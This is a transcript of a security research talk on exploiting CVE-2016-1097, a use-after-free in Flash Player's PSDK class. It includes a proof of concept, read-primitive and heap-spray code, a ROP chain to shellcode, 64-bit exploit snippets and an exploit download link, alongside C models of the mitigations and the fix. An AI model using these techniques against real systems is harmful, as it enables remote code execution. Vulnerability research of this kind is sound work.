Use-After-Use-After-Free: Exploit UAF by Generating Your Own
Transcript of the talk "Use-After-Use-After-Free: Exploit UAF by Generating Your Own" (Advanced vulnerability exploitation)
Guanxing Wen
About Me
✤ Security Researcher at Pangu LAB
✤ Enthusiastic about Flash:
  ✤ Advanced vulnerability exploitation
  ✤ Find vulnerabilities
✤ CVE-2016-1097
✤ Internet Bug Bounty
✤ @hhj4ck
Agenda
✤ Basis of Flash Exploitation & Mitigation
✤ Overview of CVE-2016-1097
✤ Use-After-Use-After-Free (UAUAF): Go Beyond Mitigation
✤ Building the Exploit from Scratch
✤ Tips for 64-bit platform & Windows 10 Exploitation
✤ Conclusion
Flash Exploit
✤ Heap Overflow
  [diagram: a vulnerable buffer sits among sprayed Vectors; the overflow reaches the length field of the neighbouring Vector, and that Vector with its oversized length becomes the Read Primitive]
✤ Use-After-Free
  [diagram: the vulnerable object sits among sprayed Vectors; after it is freed its slot is reoccupied, the length of a neighbouring Vector is corrupted, and again a Vector with an oversized length becomes the Read Primitive]
Mitigations
✤ length verification
  [diagram: the MMgc Vector object (vtable, refcount, dummy fields, buffer pointer) and its buffer (length, data); the length field is now paired with a cookie, so a length that no longer matches its cookie is detected]
  [diagram: the ByteArray object (vtable, refcount, capacity, length, array, copyOnWrite) now carries check_capacity, check_length, check_array and check_copyOnWrite fields that verify the originals]
✤ Isolated Heap
  [diagram: MMgc splits the heap into partitions: AS3 Objects; ByteArray & Vector; and separate partitions for StringBuffer, LargeObjectTracker, JSONSerializer, DataList, GCBitmap, ZCT, MMGCMetaData, FastAllocator and Code; memory freed in one partition is not handed out to another]
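As an added illustration of the length-verification mitigation described above (my own C model, not Flash Player or MMgc source): a Vector-style header whose length is paired with a cookie, and a ByteArray-style header with check_* shadow fields, following the labels on the slide. The struct layouts, the cookie constant and the corruption scenarios are constructed for the demo; a real runtime derives the secret at process start and keeps it out of reach of the script.

```c
#include <stdint.h>
#include <stdlib.h>
#include <stdio.h>

/* Hypothetical model of the two length-verification schemes on the slide.
 * Not Flash Player / MMgc code; field names follow the diagram labels. */

/* Constructed per-process secret; a real runtime picks a random value at start-up. */
static const uint32_t COOKIE = 0x5A17C0DEu;

/* Vector-style header: the length is paired with length ^ COOKIE. */
typedef struct {
    uint32_t length;
    uint32_t cookie;     /* length ^ COOKIE, rewritten on every legitimate resize */
    uint32_t *data;
} vector_t;

/* ByteArray-style header: each sensitive field has a check_* shadow copy. */
typedef struct {
    uint32_t capacity, length;
    uint8_t *array;
    uint32_t check_capacity, check_length;
    uint8_t *check_array;
} bytearray_t;

static void vector_set_length(vector_t *v, uint32_t n) {
    v->length = n;
    v->cookie = n ^ COOKIE;
}

/* 1 if the header is consistent (length matches its cookie), else 0. */
static int vector_check_length(const vector_t *v) {
    return (v->length ^ COOKIE) == v->cookie;
}

/* Bounds-checked read; returns 0 on success, -1 if the header fails verification
 * or the index is out of range. Verification runs before the bounds test, so a
 * length rewritten by a heap overflow cannot widen the readable range. */
static int vector_get(const vector_t *v, uint32_t idx, uint32_t *out) {
    if (!vector_check_length(v)) return -1;
    if (idx >= v->length) return -1;
    *out = v->data[idx];
    return 0;
}

static void bytearray_set(bytearray_t *b, uint8_t *array, uint32_t cap, uint32_t len) {
    b->array = array;      b->check_array = array;
    b->capacity = cap;     b->check_capacity = cap;
    b->length = len;       b->check_length = len;
}

/* All three shadow fields must agree with their originals. */
static int bytearray_check(const bytearray_t *b) {
    return b->length == b->check_length && b->capacity == b->check_capacity
        && b->array == b->check_array;
}

/* Scenario: a legitimate read, then the same Vector after a simulated overflow that
 * rewrote only the length field. Returns the number of reads that were rejected (2). */
static int vector_scenario(void) {
    uint32_t elems[4] = {10, 20, 30, 40};
    vector_t v = {0, 0, elems};
    uint32_t out;
    int rejected = 0;

    vector_set_length(&v, 4);
    if (vector_get(&v, 2, &out) != 0 || out != 30) return -1;  /* sanity: normal access works */

    v.length = 0xFFFFFFFFu;                               /* simulated corruption; cookie untouched */
    if (vector_get(&v, 1000, &out) != 0) rejected++;      /* out-of-range read refused */
    if (vector_get(&v, 0, &out) != 0) rejected++;         /* even an in-range read is refused */
    return rejected;
}

/* Scenario: a ByteArray whose length was corrupted without touching check_length.
 * Returns 1 when the header checked out before and is rejected afterwards. */
static int bytearray_scenario(void) {
    uint8_t buf[32] = {0};
    bytearray_t b;
    bytearray_set(&b, buf, sizeof buf, 16);
    int before = bytearray_check(&b);          /* 1: consistent */
    b.length = 0x7FFFFFFFu;                    /* simulated corruption */
    int after = bytearray_check(&b);           /* 0: mismatch detected */
    return before == 1 && after == 0;
}

int main(void) {
    printf("vector reads rejected after corruption: %d\n", vector_scenario());
    printf("bytearray corruption detected: %d\n", bytearray_scenario());
    return 0;
}
```

The point the slide makes is visible in vector_scenario: once the length is out of step with its cookie, the runtime refuses every access, not only the out-of-bounds one, which is what turns a corrupted Vector from a read primitive into a crash.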
Mitigations
✤ Heap Overflow chain: Heap Fengshui → Overflow → Read Primitive Gained → Find ROP Gadgets → Fake Vtable - RCE
✤ Use-After-Free chain: Heap Fengshui → Proper Occupation → Invoke Virtual Method → Read Primitive Gained → Find ROP Gadgets → Fake Vtable - RCE
  [diagram: both chains are annotated with the mitigations that break them: length verification and the isolated heap]
What is really necessary
✤ Read Primitive
  ✤ buffer[index]
  ✤ find ROP gadgets, wrappers
  ✤ index < 0xFFFFFFFF ?
  ✤ buffer = Vector / ByteArray ?
Use-After-Use-After-Free
  [diagram: a String object (vtable, refcount, length, buffer, …) aligned with an object holding a 4-byte Address field; the vulnerable object's slot is reoccupied by the selected object, vulnobj.funcX is dispatched as obj.funcY, and once the address field has been overwritten, obj.str is the Read Primitive]
✤ Free: Vulnerable object is released
✤ Use: Occupied with selected object
✤ Free: Release selected object (type confused call)
✤ Use: Modify the address field via occupation
  ✤ obj.str becomes a Read Primitive
✤ Free: Release the memory for next occupation
Overview of CVE-2016-1097
✤ com.adobe.tvsdk.mediacore.PSDK
✤ Undocumented Primetime Player SDK
✤ playerglobal.swc + FFDEC + Beyond Compare
✤ Introduced in Flash Player 19 beta
✤ Eliminated from Flash Player 19 release
✤ Recurred in Flash 21 beta
✤ Buggy
CVE-2016-1097
function poc():void {
    var ps:PSDK = PSDK.pSDK;   // the singleton is constructed automatically
    ps.release();              // the inner memory is freed, but the atom remains
    ps.createDispatcher();     // the atom is used after the release
}
Exploit Development
✤ PSDK Class
  [diagram: the PSDK object is 0x20 bytes: vtable1, vtable2 and dummy fields; ps.createDispatcher() … ~PSDK() are reached through the vtable]
Proper Occupation
✤ Candidate classes beside com.adobe.mediacore.PSDK: ContentFactory, MediaPlayer, metadata.MetaData, info.Track
✤ com.adobe.mediacore.info.Track(name:String, language:String, …)
  [diagram: the Track fields (vtable, length, buffer, flags, --, name:String, language:String) overlaid on the 0x20-byte PSDK layout (vtable1, vtable2, dummy fields)]
Type Confusion Call
✤ ps.createDispatcher() is invoked through the PSDK atom while its memory is occupied by a Track
  [diagram: the Track fields (vtable, length j, buffer, flags, --) overlay the PSDK slots (vtable1 / vtable0, vtable2, dummy fields)]
Type Confusion Call
✤ Metadata.setByteArray(key:String, obj:ByteArray)
  ✤ Alloc a temporary space
  ✤ Release the temporary space
  ✤ Do some calculation

var mt:Metadata = new Metadata();
var bytes:ByteArray = new ByteArray();
bytes.length = 0x20;
bytes.position = 0x0C;
bytes.writeInt(4);
var ps:PSDK = PSDK.pSDK;
ps.release();
var track:Track = new Track("j", "lan", true, true);   // proper occupation
ps.createDispatcher();                                  // type confused call: releases the memory block of Track
bytes.position = 0x10;
bytes.writeUnsignedInt(0xadd7e555);
mt.setByteArray("address", bytes);
var res:String = track.language;
var value:uint = (res.charCodeAt(3) << 24);
value |= (res.charCodeAt(2) << 16);
value |= (res.charCodeAt(1) << 8);
value |= res.charCodeAt(0);                             // Read Primitive
Code Execution
✤ Spray with Vector.<this> (every slot holds the this atom)

public function spray():void {
    gc_arr = new Array();
    var len:int = (0x1000 - 0x28) / 4;
    for (var i:int = 0; i < 0x10000; i++) {
        gc_arr[i] = new Vector.<Object>();
        for (var j:int = 0; j < len; j++)
            gc_arr[i][j] = this;
    }
}

✤ Find buffers through *this (HT tricks)
var ulimit_bytes:ByteArray;
var output:String;
var track:Track;
var gc_arr:Array;
var fill_bytes:ByteArray;
var shellcode:ByteArray;
  [diagram: PSDK layout: vtable1, vtable2, dummy fields]
Code Execution
✤ Build a fake vtable with gadgets
  [diagram: the fake vtable entry for ~PSDK() points at the gadget chain]
  ✤ xchg eax, esp # pop esi # pop ebx # retn
  ✤ xchg eax, esi # retn
  ✤ push 1 # push [eax-8] # push [eax-4] # call wrapper (=> esi)
  ✤ jump to shellcode
DEMO
64-bit Exploit
ps = PSDK.pSDK;
ps.release();
ms = new MediaResource("jack", 0x54336677, null);               // proper occupation
try { ps.createDefaultContentFactory(); } catch (e:Error) {}     // releases the memory of MediaResource
var bytes:ByteArray = new ByteArray();
bytes.endian = "littleEndian";
bytes.position = 0x30;
bytes.writeInt(1);
mt.setByteArray("jack", bytes);
64-bit Exploit
✤ Heap Spray MMgc Object
✤ Heap Spray malloced Objects
gc_arr = new Array();
ad = new AdClick("", "", "");
ms = new MediaResource("jack", 0x54336677, null);
mt = new MetaData();
for (var i:int = 0; i < 0x80000; i++) {
    gc_arr[i] = new AdAsset("", 1, ms, ad, mt);
}
✤ Metadata layout (flag)
  [diagram: Metadata object: +0 vtable, +8 dummy, …, +10 dummy, +120 ptr → table indexed by hash*8 → entry (+0 dummy, +8 dummy, +10 ptr) → node (+0 dummy, +8 dummy, +10 dummy, +18 ptr → bytes)]
  hash = func(name), hash in [0,7]: hash("vtable") = 3, hash("shellc0de") = 4, hash("param") = 0
  .setByteArray(name, bytes) stores the bytes under the slot selected by hash(name)
Windows 10 Tips
✤ PSDK is malloced
✤ LFH randomisation
✤ Multiple occupation
ps.release();
for (var i:int = 0; i < 0x100; i++) track = new Track("j", "lan", true, true);
ps.createAdPolicySelector(1, mp);
Conclusion
✤ The Fix: remove the reference manually after release()
  ✤ bypass: declare two of them (CVE-2016-4248)
  ✤ remove the release() from AS3 level
✤ Use-After-Use-After-Free
  ✤ relatively common way to retrieve a Read Primitive
  ✤ replace String with other structure ?= Write Primitive
  ✤ Memory Protector has no effect
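The fix named in the first bullet, worked as an added C model (my own code, not Adobe's PSDK implementation; the struct, function and field names are hypothetical): release() drops the atom's reference and clears its pointer, so a later call through the same atom is refused instead of dereferencing freed memory. The model goes one step beyond the slide by refcounting the inner object, which is what makes the "declare two of them" case safe as well: a second atom keeps the object alive until it releases too.

```c
#include <stdlib.h>
#include <stdio.h>

/* Hypothetical C model of the release()/use pattern behind CVE-2016-1097, with the fix
 * applied. Not Adobe's code; struct and function names are invented for the demo. */
typedef struct {
    int refcount;      /* script-visible atoms sharing this inner object */
    int dispatchers;   /* toy state touched by create_dispatcher() */
} psdk_inner_t;

typedef struct {
    psdk_inner_t *inner;   /* NULL once this atom has released its reference */
} psdk_atom_t;

static psdk_inner_t *g_singleton;   /* stands in for PSDK.pSDK */

/* PSDK.pSDK: construct the singleton on first use and hand out one reference. */
static psdk_atom_t psdk_get(void) {
    psdk_atom_t a;
    if (!g_singleton) g_singleton = calloc(1, sizeof *g_singleton);
    if (!g_singleton) { a.inner = NULL; return a; }   /* allocation failure: dead atom */
    g_singleton->refcount++;
    a.inner = g_singleton;
    return a;
}

/* release(): drop this atom's reference and clear the pointer (the fix). The inner
 * memory is freed only when the last atom lets go, so no other atom is left pointing
 * at freed memory. */
static void psdk_release(psdk_atom_t *a) {
    if (!a->inner) return;               /* double release is a no-op */
    if (--a->inner->refcount == 0) {
        if (g_singleton == a->inner) g_singleton = NULL;
        free(a->inner);
    }
    a->inner = NULL;
}

/* createDispatcher(): returns the new dispatcher count, or -1 if the atom is dead. */
static int psdk_create_dispatcher(psdk_atom_t *a) {
    if (!a->inner) return -1;            /* refused instead of a use-after-free */
    return ++a->inner->dispatchers;
}

/* The PoC sequence from the slides (release, then use) on the fixed model: -1. */
static int scenario_release_then_use(void) {
    psdk_atom_t ps = psdk_get();
    psdk_release(&ps);
    return psdk_create_dispatcher(&ps);
}

/* Two atoms ("declare two of them"): releasing one must not invalidate the other.
 * Returns 1, the dispatcher count seen through the atom that is still alive. */
static int scenario_two_atoms(void) {
    psdk_atom_t a = psdk_get();
    psdk_atom_t b = psdk_get();
    int r;
    psdk_release(&a);
    r = psdk_create_dispatcher(&b);      /* b still holds a live reference */
    psdk_release(&b);                    /* last reference: memory is freed now */
    return r;
}

int main(void) {
    printf("release then use: %d (expect -1)\n", scenario_release_then_use());
    printf("two atoms, one released: %d (expect 1)\n", scenario_two_atoms());
    return 0;
}
```

Clearing the pointer alone is the slide's fix; the refcount is the extra step that covers the second bullet, and removing release() from the script-visible API (the third bullet) removes the script's ability to trigger the free at all.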
Q & A
Thanks for your attention
Download everything from: http://www.hhjack.com/psdk.zip